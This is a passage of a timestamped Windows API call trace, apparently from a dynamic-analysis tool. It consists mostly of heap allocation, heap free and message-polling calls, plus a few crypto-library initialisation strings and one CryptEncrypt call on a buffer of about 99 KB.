RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.664] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.664] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0037.664] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0037.665] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.665] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.666] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.666] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0037.666] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.666] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.667] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.667] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0037.667] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.667] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.668] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.668] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.669] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0037.669] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.670] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0037.670] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0037.670] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da248, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da248*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0037.670] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.670] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0037.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.670] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.671] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.671] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.671] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0037.672] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0037.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.672] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1836a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x18370) returned 1 [0037.672] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.672] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0037.673] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.673] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.673] CharLowerBuffW (in: lpsz="byte[99185]", cchLength=0xb | out: lpsz="byte[99185]") returned 0xb [0037.673] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.675] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.675] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.675] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, 